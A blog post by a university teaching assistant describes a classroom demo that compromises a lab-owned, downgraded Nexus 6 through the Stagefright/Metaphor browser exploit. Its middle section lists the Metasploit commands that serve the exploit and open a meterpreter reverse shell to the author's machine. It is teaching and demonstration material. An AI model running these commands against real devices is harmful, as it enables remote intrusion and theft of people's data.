This post does not describe the Stagefright / Metaphor android vulnerability. To
understand Stagefright, check out the Wikipedia Page [1] and the
YouTube videos by Joshua J Drake [2][3] (the security
researcher who discovered stagefright). To figure out how Metaphor works, I’d
recommend understanding Stagefright, learning about ROP-chains, and then
checking out the Metaphor whitepaper [4], available from Northbit’s
repository [5].
Throughout this blog post, I will be referring to the exploit as
Stagefright/Metaphor as it is a combination of both of these exploits that
ultimately led to the shell on the vulnerable & legacy Android device.
Introduction
For the 2023 Summer semester, I’m a Teaching Assistant for a few courses, one of
which is Mobile
Security
(taught by Florian Draschbacher).
About a month prior to the beginning of the semester, we decided that we would
have a demonstration of a real over-the-air exploit to show the danger of hacks
on mobile devices 1.
A few ideas were thrown around for the exploit that we could use which included
DirtyCow [8], CheckRa1n [9], FramaRoot [10],
and Stagefright [1]. In the end after a bit of searching, we decided
to settle for Stagefright/Metaphor for a few reasons. Firstly, it was
over-the-air, i.e., we could run the exploit without any physical access. On top
of this, this could be portrayed quite dramatically - one of our primary
motives. However, the most important driving force was that we could use an
already existing metasploit implementation [6] that made our work
much easier. This blog post’s intention is to be a small document of what we
did.
The Phone
The metaphor exploit [5] was originally tested on a Nexus 5 running
Android 5.0.1 build LRX22C. Our institute (the
IAIK, TU Graz)
had a Motorola Nexus 6 in their inventory. This was released in 2014 and was
running some form of LineageOS corresponding to Android 8 (I think?) when we
first received it. The phone was immediately downgraded and rooted 2 to Android 5.0.1
[7] to test the whether the metasploit exploit would even work.
The Exploit
The exploit creates a meterpreter shell session [11] to the set IP
address. This YouTube Video
demonstrates the exploit on a emulated Android device.
These are the commands that are run on metasploit:
// these commands are run on msfconsoleuse exploit/android/browser/stagefright_mp4_tx3g_64bit
// Note that both the Android device and the computer have to be connected to// the same network!set LHOST 192.168.100.100// ip address of my computerset SRVHOST 192.168.100.100// ip address of my computerset URIPATH / // Android device visits http://192.168.100.100:8080/set verbose trueexploit --job // run the exploit in the context of a job// ...// wait for the exploit to finish setting up// the output should be something like :// ...// [*] Server started.// Android device visits the url now (http://192.168.100.100:8080/)// The browser automatically will download the exploit// once metasploit outputs `meterpreter session <id_number> opened`, detach from// the executing command (ctrl+j works)sessions --list // list sessionssessions --interact 1// assuming the session that was created has id_number 1// the meterpreter shell is now open// you should be able to type `ls` to see the contents of the root dir on the// Android device
Make sure the phone visits the HTTP port (8080 by default) and not the TCP
listening port (4444 by default). This took me an annoying hour to realize - but
to be fair, I’m pretty stupid lol.
The Demo
The shell that is gained from the exploit belongs to the user mediaserver.
This user is, unfortunately 3, limited by SELinux policies that prevent it from
being able to snoop around folders that it doesn’t own/access to 4. Since we would be
showing the exploit to people who were in the lecture, the idea was to make it
dramatic by having an attacker retrieve data from the Android device. This would
only be possible if the data was owned by the mediaserver and existed in a
directory that the mediaserver had access to. For this, we placed a zip file
called private_data.zip in /data/adspd, a directory that mediaserver could
access 5 and changed
its owner to be mediaserver.
For the “performance” in the class, I pretended to be a student sitting in the
lecture and Florian asked whether anyone would be up to lend their android
device to hack it. Of course, no one volunteered for they would have to be crazy
to willingly let the Mobile Security lecturer hack their phone. After roughly
ten seconds, I raised my hand to volunteer “my android device” which surprised a
few people. While I was instructed to visit a website, the class could see the
metasploit shell printing out a few things on the screen but were unaware of
what exactly was happening. After 10 seconds of being on the webpage, the
exploit broke in and a shell to the Android device was obtained.
After this, it was all drama - going to /data/adspd showed the zip file,
followed by an audible distressed plea from me to not download it. After
downloading the zip file and extracting it, the contents included were the
“Mobile Security 2023 Summer Final Exam Question Paper.pdf” 6 and a webpage that
opened up to this (Figure 1):
Figure 1: The webpage that was opened in front of the class
After this, I briefly explained about the exploit and its history without going
into details of the exploit itself (Figure 2).
Figure 2: I need to exercise.
The End.
Footnotes
1 Plus, it would be pretty cool to hack a phone
through the air. ↩
3 Let me clarify: this is unfortunate for us - people
who want to hack devices. This is a VERY good thing for normal users. ↩
4 One could use a different exploit to escalate to
kernel privileges as is discussed in [12]. We didn’t do this as our
device was rooted and we had access to directories that the mediaserver could
access. ↩